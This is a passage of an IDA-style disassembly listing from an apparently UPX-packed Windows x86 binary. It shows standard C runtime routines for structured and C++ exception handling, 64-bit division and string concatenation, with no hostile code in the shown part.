locret_41B711: ; CODE XREF: sub_41B6F7+C�j
retn
sub_41B6F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B712 proc near ; CODE XREF: sub_41B8CB+67�p
; sub_41BBDB+1CA�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_425418
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41B740
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41B740
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_4193AB
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41B740: ; CODE XREF: sub_41B712+11�j
; sub_41B712+1B�j
call __SEH_epilog
retn
sub_41B712 endp
; =============== S U B R O U T I N E =======================================
sub_41B746 proc near ; DATA XREF: UPX0:stru_425418�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41B746 endp
; ---------------------------------------------------------------------------
loc_41B74F: ; DATA XREF: UPX0:stru_425418�o
mov esp, [ebp-18h]
jmp sub_41BE81
; =============== S U B R O U T I N E =======================================
sub_41B757 proc near ; CODE XREF: sub_41B93A+7C�p
; sub_41B93A+FB�p ...
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_41B774
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41B774: ; CODE XREF: sub_41B757+B�j
pop esi
retn
sub_41B757 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B776 proc near ; CODE XREF: sub_41BAB6+52�p
var_50 = byte ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041B8C2 SIZE 00000003 BYTES
push 40h
push offset stru_425428
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_20], ebx
and [ebp+var_48], 0
mov eax, [edi-4]
mov [ebp+var_38], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_50]
push eax
call sub_419668
pop ecx
pop ecx
mov [ebp+var_3C], eax
call sub_41B330
mov eax, [eax+7Ch]
mov [ebp+var_40], eax
call sub_41B330
mov eax, [eax+80h]
mov [ebp+var_44], eax
call sub_41B330
mov [eax+7Ch], esi
call sub_41B330
mov ecx, [ebp+arg_8]
mov [eax+80h], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_4196FD
add esp, 14h
mov [ebp+var_20], eax
and [ebp+ms_exc.disabled], 0
jmp loc_41B8B0
; ---------------------------------------------------------------------------
loc_41B801: ; DATA XREF: UPX0:00425438�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41B845
mov eax, [ebp+var_1C]
cmp dword ptr [eax+10h], 3
jnz short loc_41B845
mov eax, [ebp+var_1C]
cmp dword ptr [eax+14h], 19930520h
jz short loc_41B835
mov eax, [ebp+var_1C]
cmp dword ptr [eax+14h], 19930521h
jnz short loc_41B845
loc_41B835: ; CODE XREF: sub_41B776+B1�j
mov eax, [ebp+var_1C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_24], 1
jz short loc_41B84C
loc_41B845: ; CODE XREF: sub_41B776+9C�j
; sub_41B776+A5�j ...
mov [ebp+var_24], 0
loc_41B84C: ; CODE XREF: sub_41B776+CD�j
mov eax, [ebp+var_24]
retn
; ---------------------------------------------------------------------------
loc_41B850: ; DATA XREF: UPX0:0042543C�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_30], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_28], eax
mov edx, [ecx+10h]
mov [ebp+var_2C], edx
xor edx, edx
loc_41B86D: ; CODE XREF: sub_41B776+14D�j
mov [ebp+var_34], edx
cmp edx, [ecx+0Ch]
jnb short loc_41B899
lea esi, [edx+edx*4]
mov ebx, [ebp+var_2C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41B8C2
cmp eax, [esi+8]
jg short loc_41B8C2
lea eax, [ebx+1]
mov [ebp+var_28], eax
mov edx, [ebp+var_30]
mov eax, [edx+eax*8]
mov [ebp+var_28], eax
loc_41B899: ; CODE XREF: sub_41B776+FD�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41B644
add esp, 10h
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_41B8B0: ; CODE XREF: sub_41B776+86�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B8CB
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_41B776 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B776
loc_41B8C2: ; CODE XREF: sub_41B776+10D�j
; sub_41B776+112�j
inc edx
jmp short loc_41B86D
; END OF FUNCTION CHUNK FOR sub_41B776
; =============== S U B R O U T I N E =======================================
sub_41B8C5 proc near ; DATA XREF: UPX0:stru_425428�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41B8C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B8CB proc near ; CODE XREF: sub_41B776+13E�p
mov eax, [ebp-38h]
mov [edi-4], eax
push dword ptr [ebp-3Ch]
call sub_4196B1
pop ecx
call sub_41B330
mov ecx, [ebp-40h]
mov [eax+7Ch], ecx
call sub_41B330
mov ecx, [ebp-44h]
mov [eax+80h], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_41B939
cmp dword ptr [esi+10h], 3
jnz short locret_41B939
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_41B912
cmp eax, 19930521h
jnz short locret_41B939
loc_41B912: ; CODE XREF: sub_41B8CB+3E�j
cmp dword ptr [ebp-48h], 0
jnz short locret_41B939
cmp dword ptr [ebp-20h], 0
jz short locret_41B939
push dword ptr [esi+18h]
call sub_419690
pop ecx
test eax, eax
jz short locret_41B939
call sub_419802
push eax
push esi
call sub_41B712
pop ecx
pop ecx
locret_41B939: ; CODE XREF: sub_41B8CB+2E�j
; sub_41B8CB+34�j ...
retn
sub_41B8CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B93A proc near ; CODE XREF: sub_41BAB6+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_425440
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_41BAA4
cmp byte ptr [ecx+8], 0
jz loc_41BAA4
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_41B976
test byte ptr [eax+3], 80h
jz loc_41BAA4
loc_41B976: ; CODE XREF: sub_41B93A+30�j
mov eax, [eax]
test eax, eax
js short loc_41B980
lea edi, [ecx+edi+0Ch]
loc_41B980: ; CODE XREF: sub_41B93A+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_41B9C2
call sub_421502
pop ecx
pop ecx
test eax, eax
jz loc_41BA9B
push 1
push edi
call sub_42151E
pop ecx
pop ecx
test eax, eax
jz loc_41BA9B
mov eax, [ebx+18h]
mov [edi], eax
loc_41B9B3: ; CODE XREF: sub_41B93A+D1�j
lea ecx, [esi+8]
call sub_41B757
mov [edi], eax
jmp loc_41BAA0
; ---------------------------------------------------------------------------
loc_41B9C2: ; CODE XREF: sub_41B93A+51�j
test byte ptr [esi], 1
jz short loc_41BA0D
call sub_421502
pop ecx
pop ecx
test eax, eax
jz loc_41BA9B
push 1
push edi
call sub_42151E
pop ecx
pop ecx
test eax, eax
jz loc_41BA9B
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_421560
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41BAA0
mov eax, [edi]
test eax, eax
jz loc_41BAA0
jmp short loc_41B9B3
; ---------------------------------------------------------------------------
loc_41BA0D: ; CODE XREF: sub_41B93A+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_41BA46
call sub_421502
pop ecx
pop ecx
test eax, eax
jz short loc_41BA9B
push 1
push edi
call sub_42151E
pop ecx
pop ecx
test eax, eax
jz short loc_41BA9B
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41B757
push eax
push edi
call sub_421560
add esp, 0Ch
jmp short loc_41BAA0
; ---------------------------------------------------------------------------
loc_41BA46: ; CODE XREF: sub_41B93A+D7�j
call sub_421502
pop ecx
pop ecx
test eax, eax
jz short loc_41BA9B
push 1
push edi
call sub_42151E
pop ecx
pop ecx
test eax, eax
jz short loc_41BA9B
push dword ptr [esi+18h]
call sub_42153A
pop ecx
test eax, eax
jz short loc_41BA9B
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_41BA8A
push 1
call sub_41B757
push eax
push dword ptr [esi+18h]
push edi
call sub_4193AB
jmp short loc_41BAA0
; ---------------------------------------------------------------------------
loc_41BA8A: ; CODE XREF: sub_41B93A+13B�j
call sub_41B757
push eax
push dword ptr [esi+18h]
push edi
call sub_4193AB
jmp short loc_41BAA0
; ---------------------------------------------------------------------------
loc_41BA9B: ; CODE XREF: sub_41B93A+5C�j
; sub_41B93A+6E�j ...
call sub_41BEB6
loc_41BAA0: ; CODE XREF: sub_41B93A+83�j
; sub_41B93A+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41BAA4: ; CODE XREF: sub_41B93A+1B�j
; sub_41B93A+25�j ...
call __SEH_epilog
retn
sub_41B93A endp
; =============== S U B R O U T I N E =======================================
sub_41BAAA proc near ; DATA XREF: UPX0:stru_425440�o
xor eax, eax
inc eax
retn
sub_41BAAA endp
; ---------------------------------------------------------------------------
loc_41BAAE: ; DATA XREF: UPX0:stru_425440�o
mov esp, [ebp-18h]
jmp sub_41BE81
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAB6 proc near ; CODE XREF: sub_41BB1D+A0�p
; sub_41BBDB+19F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_41BACA
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_41B93A
pop ecx
pop ecx
loc_41BACA: ; CODE XREF: sub_41BAB6+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_41BAD6
push esi
jmp short loc_41BAD9
; ---------------------------------------------------------------------------
loc_41BAD6: ; CODE XREF: sub_41BAB6+1B�j
push [ebp+arg_14]
loc_41BAD9: ; CODE XREF: sub_41BAB6+1E�j
call sub_4193B2
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41B644
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41B776
add esp, 28h
test eax, eax
jz short loc_41BB1B
push esi
push eax
call sub_41937B
loc_41BB1B: ; CODE XREF: sub_41BAB6+5C�j
pop ebp
retn
sub_41BAB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB1D proc near ; CODE XREF: sub_41BBDB+1F5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_41BBD8
call sub_41B330
cmp dword ptr [eax+74h], 0
jz short loc_41BB5C
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_419475
add esp, 1Ch
test eax, eax
jnz short loc_41BBD8
loc_41BB5C: ; CODE XREF: sub_41BB1D+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4195EE
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_41BBD7
push ebx
loc_41BB82: ; CODE XREF: sub_41BB1D+B7�j
cmp esi, [edi]
jl short loc_41BBC8
cmp esi, [edi+4]
jg short loc_41BBC8
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41BBA3
cmp byte ptr [ecx+8], 0
jnz short loc_41BBC8
loc_41BBA3: ; CODE XREF: sub_41BB1D+7E�j
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
lea ebx, [eax-10h]
push [ebp+arg_10]
xor ecx, ecx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41BAB6
mov esi, [ebp+arg_14]
add esp, 18h
loc_41BBC8: ; CODE XREF: sub_41BB1D+67�j
; sub_41BB1D+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_41BB82
pop ebx
loc_41BBD7: ; CODE XREF: sub_41BB1D+62�j
pop edi
loc_41BBD8: ; CODE XREF: sub_41BB1D+F�j
; sub_41BB1D+3D�j
pop esi
leave
retn
sub_41BB1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBDB proc near ; CODE XREF: sub_41BDDF+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_1], 0
mov [ebp+var_1C], eax
jl short loc_41BBFB
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41BC00
loc_41BBFB: ; CODE XREF: sub_41BBDB+16�j
call sub_41BEB6
loc_41BC00: ; CODE XREF: sub_41BBDB+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_41BDB4
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz loc_41BCA8
mov eax, [ebx+14h]
cmp eax, edi
jz short loc_41BC2F
cmp eax, 19930521h
jnz short loc_41BCA8
loc_41BC2F: ; CODE XREF: sub_41BBDB+4B�j
cmp dword ptr [ebx+1Ch], 0
jnz short loc_41BCA8
call sub_41B330
cmp dword ptr [eax+7Ch], 0
jz loc_41BDAC
call sub_41B330
mov esi, [eax+7Ch]
mov [ebp+arg_0], esi
call sub_41B330
mov eax, [eax+80h]
push 1
push esi
mov [ebp+arg_8], eax
mov [ebp+var_1], 1
call sub_421502
test eax, eax
pop ecx
pop ecx
jnz short loc_41BC74
call sub_41BEB6
loc_41BC74: ; CODE XREF: sub_41BBDB+92�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_41BDB1
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_41BCA5
mov eax, [eax+14h]
cmp eax, edi
jz short loc_41BC97
cmp eax, 19930521h
jnz short loc_41BCA5
loc_41BC97: ; CODE XREF: sub_41BBDB+B3�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jnz short loc_41BCA5
call sub_41BEB6
loc_41BCA5: ; CODE XREF: sub_41BBDB+AC�j
; sub_41BBDB+BA�j ...
mov ebx, [ebp+arg_0]
loc_41BCA8: ; CODE XREF: sub_41BBDB+40�j
; sub_41BBDB+52�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_41BDB4
cmp dword ptr [ebx+10h], 3
jnz loc_41BDB4
mov eax, [ebx+14h]
cmp eax, edi
jz short loc_41BCD0
cmp eax, 19930521h
jnz loc_41BDB4
loc_41BCD0: ; CODE XREF: sub_41BBDB+E8�j
mov esi, [ebp+var_1C]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_C]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4195EE
mov ecx, [ebp+var_C]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_8], eax
jnb loc_41BD9C
jmp short loc_41BCFE
; ---------------------------------------------------------------------------
loc_41BCFB: ; CODE XREF: sub_41BBDB+1BB�j
mov esi, [ebp+var_1C]
loc_41BCFE: ; CODE XREF: sub_41BBDB+11E�j
cmp [eax], esi
jg loc_41BD87
cmp esi, [eax+4]
jg short loc_41BD87
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_18], ecx
jle short loc_41BD87
loc_41BD18: ; CODE XREF: sub_41BBDB+180�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_10], edx
mov [ebp+var_14], ecx
jle short loc_41BD51
loc_41BD2D: ; CODE XREF: sub_41BBDB+171�j
mov eax, [ebp+var_10]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_41B5D7
test eax, eax
pop ecx
jnz short loc_41BD5F
dec [ebp+var_14]
add [ebp+var_10], 4
cmp [ebp+var_14], eax
jg short loc_41BD2D
mov eax, [ebp+var_8]
loc_41BD51: ; CODE XREF: sub_41BBDB+150�j
dec [ebp+var_18]
add esi, 10h
cmp [ebp+var_18], 0
jg short loc_41BD18
jmp short loc_41BD87
; ---------------------------------------------------------------------------
loc_41BD5F: ; CODE XREF: sub_41BBDB+165�j
push [ebp+arg_1C]
mov edi, [ebp+var_8]
push [ebp+arg_18]
mov ecx, [ebp+var_24]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_41BAB6
mov ebx, [ebp+arg_0]
add esp, 18h
mov eax, edi
loc_41BD87: ; CODE XREF: sub_41BBDB+125�j
; sub_41BBDB+12E�j ...
inc [ebp+var_C]
mov ecx, [ebp+var_C]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_8], eax
jb loc_41BCFB
loc_41BD9C: ; CODE XREF: sub_41BBDB+118�j
cmp [ebp+arg_14], 0
jz short loc_41BDAC
push 1
push ebx
call sub_41B712
pop ecx
pop ecx
loc_41BDAC: ; CODE XREF: sub_41BBDB+63�j
; sub_41BBDB+1C5�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41BDB1: ; CODE XREF: sub_41BBDB+9F�j
mov ebx, [ebp+arg_0]
loc_41BDB4: ; CODE XREF: sub_41BBDB+31�j
; sub_41BBDB+D3�j ...
cmp [ebp+arg_14], 0
jnz short loc_41BDDA
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41BB1D
add esp, 20h
jmp short loc_41BDAC
; ---------------------------------------------------------------------------
loc_41BDDA: ; CODE XREF: sub_41BBDB+1DD�j
jmp sub_41BE81
sub_41BBDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BDDF proc near ; CODE XREF: sub_419404+21�p
; sub_41943A+32�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_41BDFC
call sub_41BEB6
loc_41BDFC: ; CODE XREF: sub_41BDDF+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41BE24
cmp dword ptr [esi+4], 0
jz short loc_41BE7A
cmp [ebp+arg_14], 0
jnz short loc_41BE7A
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41B644
add esp, 10h
jmp short loc_41BE7A
; ---------------------------------------------------------------------------
loc_41BE24: ; CODE XREF: sub_41BDDF+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41BE7A
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41BE5E
cmp [eax+14h], edi
jbe short loc_41BE5E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41BE5E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41BE7D
; ---------------------------------------------------------------------------
loc_41BE5E: ; CODE XREF: sub_41BDDF+51�j
; sub_41BDDF+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41BBDB
add esp, 20h
loc_41BE7A: ; CODE XREF: sub_41BDDF+2A�j
; sub_41BDDF+30�j ...
xor eax, eax
inc eax
loc_41BE7D: ; CODE XREF: sub_41BDDF+7D�j
pop edi
pop esi
pop ebp
retn
sub_41BDDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE81 proc near ; CODE XREF: sub_41B626+19�j
; UPX0:0041B752�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0042189D SIZE 00000018 BYTES
push 8
push offset stru_425450
call __SEH_prolog
call sub_41B330
cmp dword ptr [eax+6Ch], 0
jz short loc_41BEB1
and [ebp+ms_exc.disabled], 0
call sub_41B330
call dword ptr [eax+6Ch]
jmp short loc_41BEAD
; ---------------------------------------------------------------------------
loc_41BEA6: ; DATA XREF: UPX0:stru_425450�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41BEAA: ; DATA XREF: UPX0:stru_425450�o
mov esp, [ebp+ms_exc.old_esp]
loc_41BEAD: ; CODE XREF: sub_41BE81+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41BEB1: ; CODE XREF: sub_41BE81+15�j
jmp loc_42189D
sub_41BE81 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEB6 proc near ; CODE XREF: sub_4195EE+23�p
; sub_4195EE:loc_419658�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_425460
call __SEH_prolog
mov eax, off_42A70C
test eax, eax
jz short loc_41BEDE
and [ebp+ms_exc.disabled], 0
call eax ; sub_41BE81
jmp short loc_41BEDA
; ---------------------------------------------------------------------------
loc_41BED3: ; DATA XREF: UPX0:stru_425460�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41BED7: ; DATA XREF: UPX0:stru_425460�o
mov esp, [ebp+ms_exc.old_esp]
loc_41BEDA: ; CODE XREF: sub_41BEB6+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41BEDE: ; CODE XREF: sub_41BEB6+13�j
jmp sub_41BE81
sub_41BEB6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEF0 proc near ; CODE XREF: sub_4196FD+45�p
; sub_41B644+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_419825
push esi
push edi
call eax ; TlsFree
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41BF2F
mov ecx, 2
loc_41BF2F: ; CODE XREF: sub_41BEF0+38�j
push ecx
call sub_419825
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41BEF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BF40 proc near ; CODE XREF: sub_419875+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_41BF62
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_41BFA3
; ---------------------------------------------------------------------------
loc_41BF62: ; CODE XREF: sub_41BF40+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_41BF70: ; CODE XREF: sub_41BF40+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41BF70
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41BF9E
cmp edx, [esp+8+arg_4]
ja short loc_41BF9E
jb short loc_41BF9F
cmp eax, [esp+8+arg_0]
jbe short loc_41BF9F
loc_41BF9E: ; CODE XREF: sub_41BF40+4E�j
; sub_41BF40+54�j
dec esi
loc_41BF9F: ; CODE XREF: sub_41BF40+56�j
; sub_41BF40+5C�j
xor edx, edx
mov eax, esi
loc_41BFA3: ; CODE XREF: sub_41BF40+20�j
pop esi
pop ebx
retn 10h
sub_41BF40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFB0 proc near ; CODE XREF: sub_419A76+F5�p
; sub_41A0AD+F5�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41C025
sub_41BFB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFC0 proc near ; CODE XREF: UPX0:0041AE88�p
; UPX0:0041AE93�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41BFE0
loc_41BFCD: ; CODE XREF: sub_41BFC0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41C013
test ecx, 3
jnz short loc_41BFCD
mov edi, edi
loc_41BFE0: ; CODE XREF: sub_41BFC0+B�j
; sub_41BFC0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41BFE0
mov eax, [ecx-4]
test al, al
jz short loc_41C022
test ah, ah
jz short loc_41C01D
test eax, 0FF0000h
jz short loc_41C018
test eax, 0FF000000h
jz short loc_41C013
jmp short loc_41BFE0
; ---------------------------------------------------------------------------
loc_41C013: ; CODE XREF: sub_41BFC0+14�j
; sub_41BFC0+4F�j
lea edi, [ecx-1]
jmp short loc_41C025
; ---------------------------------------------------------------------------
loc_41C018: ; CODE XREF: sub_41BFC0+48�j
lea edi, [ecx-2]
jmp short loc_41C025
; ---------------------------------------------------------------------------
loc_41C01D: ; CODE XREF: sub_41BFC0+41�j
lea edi, [ecx-3]
jmp short loc_41C025
; ---------------------------------------------------------------------------
loc_41C022: ; CODE XREF: sub_41BFC0+3D�j
lea edi, [ecx-4]
loc_41C025: ; CODE XREF: sub_41BFB0+5�j
; sub_41BFC0+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41C04E
loc_41C031: ; CODE XREF: sub_41BFC0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41C0A0
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41C031
jmp short loc_41C04E
; ---------------------------------------------------------------------------
